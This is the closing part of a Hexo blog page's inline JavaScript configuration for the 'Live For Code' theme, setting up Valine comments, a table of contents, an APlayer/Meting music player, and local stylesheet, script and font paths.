            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js"
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>